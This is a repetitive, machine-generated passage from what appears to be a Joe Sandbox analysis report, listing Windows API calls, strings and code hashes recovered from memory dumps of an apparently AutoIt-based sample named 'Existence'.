                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                          • Opcode ID: ff43dda3f84250948d956d9f3e042f05644a8be6c25d4ce73f1151fa54bc3097
                                                                                                                                                                                          • Instruction ID: 3c461129bcd8061868dbdb97cb7fd3b30ceb4167f25f972610c7a4e90b593fd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff43dda3f84250948d956d9f3e042f05644a8be6c25d4ce73f1151fa54bc3097
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E41F531608788DED7399B38C9CCF7A7B92AB46350F25853DE94746A60D77DA880C731
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C37B7
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 007C37BF
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C37CA
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 007C37D6
                                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007C3812
                                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C3823
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007C6504,?,?,000000FF,00000000,?,000000FF,?), ref: 007C385E
                                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C387D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                          • Opcode ID: 63cd59f6c2d270bc58b83fa55e7eb880e95018b06ee62e1fa244ff1bd85d4d41
                                                                                                                                                                                          • Instruction ID: c8b0f5825b8a5eb40f293fbcc1f7f72f6da2ab41f97341078ec0890a63c2cdbe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 63cd59f6c2d270bc58b83fa55e7eb880e95018b06ee62e1fa244ff1bd85d4d41
                                                                                                                                                                                          • Instruction Fuzzy Hash: C531A072201214BFEB214F54CC89FEB3BADEF49751F048069FE089A191C6B99C41CBB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                          • Opcode ID: e58292dd387b279785079d190bb766cd3bb79981c7cef3d888805a0c1387af1c
                                                                                                                                                                                          • Instruction ID: 2e22b05fb2242b639a5564489b5ab6de350943de382ee5e7a320527c9c85fddc
                                                                                                                                                                                          • Opcode Fuzzy Hash: e58292dd387b279785079d190bb766cd3bb79981c7cef3d888805a0c1387af1c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD18EB1A0060A9FDF10CFA8C885BEEB7B5BF48304F148569E915AB281E774ED45CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0077194E
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 007719D1
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00771B7B,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771A64
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771A7B
                                                                                                                                                                                            • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771AF7
                                                                                                                                                                                          • __freea.LIBCMT ref: 00771B22
                                                                                                                                                                                          • __freea.LIBCMT ref: 00771B2E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                                          • Opcode ID: 61ac0787f90e9fb60ac44cffda6bc2c97e9a7fead676eb4978478db63b1f4f18
                                                                                                                                                                                          • Instruction ID: d2b41f705447c8108699801dd10df995f8bac90e453ad7f5fecc65ea7d1a03b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ac0787f90e9fb60ac44cffda6bc2c97e9a7fead676eb4978478db63b1f4f18
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5091E572E002569BDF208E68CC55EEEBBB5DF09390F598569E909E7150E73CDC41CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                                          • Opcode ID: ff90607737a04b115aa030afa171219aede31f0579b238df6e76be6fb8112785
                                                                                                                                                                                          • Instruction ID: 4a0512f3a4746f90a661a9fbff6d8d05866e15d9763487e7cedb65dbfd2ac969
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff90607737a04b115aa030afa171219aede31f0579b238df6e76be6fb8112785
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A919C71A00619ABDF24DFA8CC88FEEBBB8EF45714F108559F505AB280D7789945CFA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007A1C1B
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1C43
                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 007A1C67
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1C97
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1D1E
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1D83
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1DEF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2550207440-0
                                                                                                                                                                                          • Opcode ID: f5a4887200aded5ba210c42c78a167be8e1f68dd1497926aacad4b8f01b6459e
                                                                                                                                                                                          • Instruction ID: 85b689964e4e313ff2f3245d1885c7c69f5f1641280ce7c1f680e7f56b78e881
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a4887200aded5ba210c42c78a167be8e1f68dd1497926aacad4b8f01b6459e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D91E571A00219DFEB009FA4C889BFE77B4FF86721F548129E951EB291D77CA940CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                          • Opcode ID: 4208e7254902d7f2b62b34d81ab7bb14dd2de30a6e14f73132c63f7dc8e39a05
                                                                                                                                                                                          • Instruction ID: fefa3736640a9e6096ef56c7881b67942ea0f894526c0f4d89ecb059e95a3721
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4208e7254902d7f2b62b34d81ab7bb14dd2de30a6e14f73132c63f7dc8e39a05
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E916B71E40219EFDB10CFA9CC84AEEBBB8FF49320F148159E915B7252C7799941CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B43C8
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007B44D7
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007B44E7
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B467C
                                                                                                                                                                                            • Part of subcall function 007A169E: VariantInit.OLEAUT32(00000000), ref: 007A16DE
                                                                                                                                                                                            • Part of subcall function 007A169E: VariantCopy.OLEAUT32(?,?), ref: 007A16E7
                                                                                                                                                                                            • Part of subcall function 007A169E: VariantClear.OLEAUT32(?), ref: 007A16F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                                          • Opcode ID: 75ac892cc9ca994c721ec00e410d9d69b92dfb9fba6d511d73841fc146b72413
                                                                                                                                                                                          • Instruction ID: e2e6b51b0dc5698f33a30eaf487593bc81cbcbd0cc76872677cba6490d130cc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ac892cc9ca994c721ec00e410d9d69b92dfb9fba6d511d73841fc146b72413
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74914674608341DFC714DF24C484AAAB7E5BF89714F14892DF8899B352DB39ED06CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?,?,00790C4E), ref: 0079091B
                                                                                                                                                                                            • Part of subcall function 007908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790936
                                                                                                                                                                                            • Part of subcall function 007908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790944
                                                                                                                                                                                            • Part of subcall function 007908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?), ref: 00790954
                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007B56AE
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007B57B6
                                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 007B582C
                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 007B5837
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                                          • Opcode ID: a036017ddf5ec69f1fc1a80e2e8b75c9cb4b5700ba911f6afc1af4d84bdd44d0
                                                                                                                                                                                          • Instruction ID: 32632e3d7eb486adbc2c9d7aab74e125dd657c952bfd670adba41980b85f44a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: a036017ddf5ec69f1fc1a80e2e8b75c9cb4b5700ba911f6afc1af4d84bdd44d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E91F571D00219EFDF10DFA4D885FEEB7B9AF08314F104569E915A7251DB789A44CFA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenu.USER32(?), ref: 007C2C1F
                                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 007C2C51
                                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C2C79
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C2CAF
                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 007C2CE9
                                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 007C2CF7
                                                                                                                                                                                            • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
                                                                                                                                                                                            • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
                                                                                                                                                                                            • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C2D7F
                                                                                                                                                                                            • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                                          • Opcode ID: fc065ef15b4098d1fa56b94c8e39a763c76389dc780bc5de00c96489a2aec8f1
                                                                                                                                                                                          • Instruction ID: 8b9071f03fe55151f46c0972748e8065622e6d2457e0cdbc34b166d0f09461ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc065ef15b4098d1fa56b94c8e39a763c76389dc780bc5de00c96489a2aec8f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47715D75A00205EFCB14EF64C845FAEB7B5EF48310F14846DE816AB352DB78EE428B90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 007C8992
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 007C899E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007C8A79
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 007C8AAC
                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 007C8AE4
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 007C8B06
                                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007C8B1E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4072528602-0
                                                                                                                                                                                          • Opcode ID: d646f3e03561abbf514ac9de17273a5b7a91d6676528b9a3d625619ae3061914
                                                                                                                                                                                          • Instruction ID: 27cfb04fd4930b8d56822e7af686578e78972ea7bdc9f44d5b877b70b62d9005
                                                                                                                                                                                          • Opcode Fuzzy Hash: d646f3e03561abbf514ac9de17273a5b7a91d6676528b9a3d625619ae3061914
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43716C74600604EFDBA1DF54C888FBEBBB5EF4A300F14855EE94567261CB39AD80DB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(?), ref: 0079B8C0
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0079B8D5
                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0079B936
                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0079B964
                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0079B983
                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0079B9C4
                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0079B9E7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                          • Opcode ID: 0699dee601591ce24da9213d3888c4020d87b0184628c92dec4483691f2c2c38
                                                                                                                                                                                          • Instruction ID: d9c240f891830ba4f2d61df5e5a862b89cab7471561a79098947ef736f051c77
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0699dee601591ce24da9213d3888c4020d87b0184628c92dec4483691f2c2c38
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51EFA06187D57EFF364234BD49BBABEA99B06314F088489E1D9458D2C3ECACC4D790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 0079B6E0
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0079B6F5
                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0079B756
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0079B782
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0079B79F
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0079B7DE
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0079B7FF
                                                                                                                                                                                          Memory Dump Source
